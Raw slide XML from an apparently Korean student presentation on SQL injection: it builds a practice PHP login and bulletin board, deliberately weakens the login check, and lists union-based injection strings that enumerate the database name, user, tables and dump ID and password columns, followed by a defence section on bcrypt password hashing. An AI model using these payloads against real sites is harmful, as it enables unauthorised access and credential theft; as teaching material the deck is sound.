            <a:endParaRPr kumimoji="1" lang="ko-KR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6" name="Picture 2" descr="C:\Users\rbghk\Desktop\아톰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528" y="2564904"/>
            <a:ext cx="3899466" cy="27867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_PO2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4543872" y="3437384"/>
            <a:ext cx="4573016" cy="1686743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자유 오픈 소스 형태의 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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OS X, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US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리눅스</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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윈도우 문서 및 소스 코드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편집기로</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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이번 프로젝트에서는 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR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PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US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에디터로 사용하였습니다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85908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웹 사이트 구축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106500"/>
            <a:ext cx="4680520" cy="549085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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/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1600" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="1600" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/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실습을 위한 임의의 웹 사이트를 구축합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/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kumimoji="1" lang="ko-KR" sz="1600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37672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로그인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106500"/>
            <a:ext cx="4680520" cy="549085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 DB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ID, PW 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값으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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로그인을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실행합니다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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>→</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="조선일보명조" panose="02030304000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="조선일보명조" panose="02030304000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>성공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3739095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err="1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3. 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이번에는 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있는 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ID, PW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아닌 임의의 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쿼리문을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ID, PW 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값에 삽입하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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로그인을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실행합니다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i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln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1600" dirty="0" smtClean="0"/>
              <a:t>→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로그인 오류</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" sz="1600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107504" y="5013176"/>
            <a:ext cx="4824536" cy="168593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3" name="그림 1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2521" y="1052736"/>
            <a:ext cx="4799519" cy="3754052"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="직선 화살표 연결선 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2555776" y="4581128"/>
            <a:ext cx="0" cy="566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18322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PHP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 수정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076056" y="1052736"/>
            <a:ext cx="3888432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 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공격을 위하여 임의로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PHP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문을 수정 후 저장합니다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ea typeface="조선일보명조" panose="02030304000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>If($id==$row[‘id’] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="조선일보명조" panose="02030304000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> $pw==$row[‘pw’])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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 smtClean="0"/>
              <a:t>↓</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
              <a:ea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ea typeface="조선일보명조" panose="02030304000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>If($id</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="조선일보명조" panose="02030304000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>==$</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="조선일보명조" panose="02030304000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>_POST</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="조선일보명조" panose="02030304000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>[‘</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:ea typeface="조선일보명조" panose="02030304000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>id’] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:ea typeface="조선일보명조" panose="02030304000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> $pw</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="조선일보명조" panose="02030304000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>==$</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="조선일보명조" panose="02030304000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>_POST</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="조선일보명조" panose="02030304000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>[‘</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:ea typeface="조선일보명조" panose="02030304000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>pw’])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323528" y="1268760"/>
            <a:ext cx="4536504" cy="260192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097" y="4077072"/>
            <a:ext cx="4536504" cy="259648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직선 화살표 연결선 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2627784" y="3587470"/>
            <a:ext cx="0" cy="566428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0067843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323528" y="188640"/>
            <a:ext cx="7488832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Part 1. SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4000" dirty="0" err="1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인젝션</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="6000" dirty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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="_PO3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="538162" y="1946870"/>
            <a:ext cx="7058173" cy="421843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400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인젝션은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무엇이며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왜 보안에 취약할까</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1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en-US" altLang="ko-KR" sz="36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OWASP TOP10</a:t>
            </a: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en-US" altLang="ko-KR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웹</a:t>
            </a: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해킹 공격비율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en-US" altLang="ko-KR" sz="36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en-US" altLang="ko-KR" sz="2400" b="0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400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공격의 위험성</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2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en-US" altLang="ko-KR" sz="3600" b="0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en-US" altLang="ko-KR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400" dirty="0" err="1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</a:t>
            </a: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공격의 접근법</a:t>
            </a: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en-US" altLang="ko-KR" sz="2400" dirty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en-US" alt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ko-KR" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg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7992888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PHP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문 수정 후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err="1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106500"/>
            <a:ext cx="4680520" cy="549085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 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다시 임의의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쿼리문을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ID, PW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값에 삽입하여 로그인합니다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8728707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7992888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err="1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삽입으로 로그인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106500"/>
            <a:ext cx="4680520" cy="549085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6.  DB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저장된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ID, PW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가 같지 않아도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삽입으로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로그인을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성공합니다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3422198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7992888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게시판 접속 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7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실습 웹 사이트에 임의의 게시판을 구축하여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게시글로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접속합니다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2636912"/>
            <a:ext cx="5076056" cy="259228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6651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8820472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err="1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삽입으로 테이블의 필드 수 파악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076056" y="1052736"/>
            <a:ext cx="3888432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8. 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게시글에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쓰이는 테이블의 필드 수를 알아내기 위하여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URL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주소란에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 </a:t>
            </a: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order by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1#’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 삽입하여 실행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출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력 오류가 뜰 때까지 숫자를 늘려 실행합니다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‘order by 10#’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삽입 했을 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때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출력 오류가 떴으므로 필드 수는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임을 알 수 있습니다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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="직사각형 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="1340768"/>
            <a:ext cx="4536504" cy="2601924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26097" y="4077072"/>
            <a:ext cx="4536504" cy="2596480"/>
          </a:xfrm>
          <a:prstGeom prst="rect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0779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7992888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err="1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삽입으로 위치 파악 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9.  ‘union select 1,2,3,4,5,6,7,8,9#’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삽입하여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필드 값이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게시글의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어느 부분에 표시 되는지를 파악합니다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2636912"/>
            <a:ext cx="5076056" cy="2520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32828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7992888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err="1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삽입으로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명 조회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10.  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‘union select 1,database(),3,4,5,6,7,8,9#’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삽입하여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DB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명을 조회하여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게시글에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출력합니다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lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>member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008" y="2492896"/>
            <a:ext cx="5076056" cy="280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1947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8640960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err="1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삽입으로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계정 명 조회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11.  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‘union select 1,database(),3,4,user(),6,7,8,9#’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를 삽입하여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DB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계정 명을 조회하여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게시글에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출력합니다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lang="ko-KR" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>root@localhost</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="16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7504" y="2276872"/>
            <a:ext cx="5076056" cy="3744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60423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8640960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err="1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삽입으로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테이블 명 조회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106500"/>
            <a:ext cx="4680520" cy="549085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marL="342900" indent="-34290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  <a:buAutoNum type="arabicPeriod" startAt="12"/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‘union select 1,database(),3,4,user(),(select </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR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group_concat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1" lang="en-US" altLang="ko-KR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table_name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 from </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR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information_schema_table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where </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR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table_schema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=‘member’),7,8,9#’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삽입하여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저장되어 있는 각 </a:t>
            </a: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테이블 명을 조회하여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게시글에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출력합니다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1534471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8640960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err="1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삽입으로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계정 정보 탈취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106500"/>
            <a:ext cx="4680520" cy="549085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13.  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‘union select 1,database(),3,4,user(),(select </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR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group_concat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(id) from test),7,8,9#’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삽입하여 테이블의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ID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필드 레코드 목록을 조회하여 각 계정 정보를 탈취합니다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1960675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8640960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공격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ko-KR" altLang="en-US" sz="2800" b="1" dirty="0" err="1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삽입으로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각 계정 정보 탈취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23528" y="1106500"/>
            <a:ext cx="4680520" cy="5490852"/>
          </a:xfrm>
          <a:prstGeom prst="rect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14.  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‘union select 1,database(),3,4,user(),(select </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR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group_concat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(pw) from test),7,8,9#’</a:t>
            </a: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을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삽입하여 테이블의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PW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필드 레코드 목록을 조회하여 각 계정 정보를 탈취합니다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/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27877244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_PO2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="107504" y="116632"/>
            <a:ext cx="9144000" cy="51960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marR="0" lvl="0" indent="-5143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1" lang="en-US" altLang="ko-KR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3200" b="1" dirty="0" err="1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인젝션은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무엇이며</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR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왜 보안에 취약할까</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR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</a:p>
        </p:txBody>
      </p:sp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79512" y="5229200"/>
            <a:ext cx="8784976" cy="1584176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r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US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400" dirty="0" err="1">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>인젝션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(SQL Injection; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>SQLi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)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은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>관계형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 데이터 베이스 관리 시스템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(RDBMS)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을 통제하기 위해 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문장에 악의적인 데이터를 삽입하여 공격자가 원하는 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400" dirty="0" err="1">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>쿼리문을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 실행하는 해킹 방법입니다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. </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
              <a:ea typeface="제주명조" pitchFamily="2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512" y="1124744"/>
            <a:ext cx="8784976" cy="3888432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8640960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방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어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DB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값을 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2800" b="1" dirty="0" err="1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해쉬화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 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‘$</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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user_pw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= </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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password_hash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($</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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user_pw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 PASSWORD_BCRYPT);</a:t>
            </a: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입력된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PW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값을 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BCRYPT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방식으로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해쉬하여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에 저장</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1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82544448" descr="EMB00000f245c4c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512" y="1340768"/>
            <a:ext cx="4854905" cy="46805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63270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8640960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방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어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DB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값을 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2800" b="1" dirty="0" err="1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해쉬화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1.  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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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password_verify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($pw, $</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR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hash_password</a:t>
            </a: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)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입력된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PW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와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저장된 값이 일치하면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TRUE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값을 출력해줘서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로그인이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된다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8" name="Picture 4" descr="C:\Users\rbghk\Desktop\해시로그인성공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5923" y="2708920"/>
            <a:ext cx="4788024" cy="2600575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700"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100343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8640960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4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방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어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실습 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR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– </a:t>
            </a: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DB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값을 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2800" b="1" dirty="0" err="1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해쉬화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5" name="_PO2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5292080" y="1052736"/>
            <a:ext cx="3672408" cy="561662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2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 SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="1600" dirty="0" err="1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endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean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1600" dirty="0" err="1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쿼리문</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="16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삽입으로 각 계정 정보 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탈취 공격을 받아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PW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의 값이 노출이 되지만 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PW</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US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값을 식별하기 어렵다</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="16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</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr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lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/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Rectangle 2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073" name="_x182551168" descr="EMB00000f245c5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598" y="1268760"/>
            <a:ext cx="4743450" cy="50594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7790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9144000" cy="6858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3" name="직사각형 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539552" y="548680"/>
            <a:ext cx="8064896" cy="1224136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Part </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4000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lang="en-US" altLang="ko-KR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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4000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영상</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="6000" dirty="0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4" name="_PO3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="538162" y="2090886"/>
            <a:ext cx="8605837" cy="277827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r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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영상</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2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  <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-34290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-"/>
              <a:tabLst/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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64565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8" name="_PO1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="900113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267" name="_PO2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="323528" y="206387"/>
            <a:ext cx="6488113" cy="48733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5</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" alt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. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="28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영</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2800" b="1" dirty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상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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" sz="2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5" name="_PO2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="354843" y="1124744"/>
            <a:ext cx="7920880" cy="719414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algn="ctr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4000" b="1" dirty="0" smtClean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구현영상</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" sz="4000" b="1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6" name="_PO2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="687019" y="2060848"/>
            <a:ext cx="7560840" cy="360040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en-US" altLang="ko-KR" dirty="0"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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=kzbArNF_K8Q&amp;feature=youtu.be</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean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21" y="2694560"/>
            <a:ext cx="7862697" cy="3652887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/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638199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9" name="_PO2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="107504" y="116632"/>
            <a:ext cx="9144000" cy="519609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514350" marR="0" lvl="0" indent="-51435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AutoNum type="arabicPeriod"/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR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3200" b="1" dirty="0" err="1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인젝션은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 무엇이며</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR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왜 보안에 취약할까</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="조선일보명조" panose="02030304000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="조선일보명조" panose="02030304000000000000" pitchFamily="18" charset="-127"/>
                <a:cs typeface="조선일보명조" panose="02030304000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="_PO2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="179512" y="1412776"/>
            <a:ext cx="8784976" cy="2448272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fontAlgn="base"/>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR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400" dirty="0" err="1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인젝션은</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US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가장 오래되고</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR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, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US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가장 흔하면서도 가장 위험한 웹 어플리케이션 공격 중 하나이다</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR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. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean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  <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2400" dirty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데이터베이스의 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR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엔진을 속여 특수 조작된 문자열을 입력하고 악의적인 명령문들을 실행함으로써 해커에게 제한된 데이터를 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean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  <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="24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보거나 조작할 수 있게 무단 접근 권한을 제공합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="24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  <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
              <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
              <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
              <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
            </a:endParaRP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2584" y="3933056"/>
            <a:ext cx="5281704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377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856" y="1001192"/>
            <a:ext cx="8755632" cy="5740176"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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07504" y="116632"/>
            <a:ext cx="6488113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1" dirty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2</a:t>
            </a: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.   OWASP  TOP10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 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42191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07504" y="116632"/>
            <a:ext cx="6488113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3.  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웹</a:t>
            </a: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="3200" b="1" dirty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해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킹 공격 비율</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" sz="2800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="조선일보명조" panose="02030304000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="조선일보명조"/>
                <a:cs typeface="조선일보명조" panose="02030304000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> 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/>
              <a:cs typeface="조선일보명조" panose="02030304000000000000" pitchFamily="18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54" t="1523" r="1227" b="2319"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="980728"/>
            <a:ext cx="6320386" cy="5877272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="_PO2"/>
          <p:cNvSpPr>
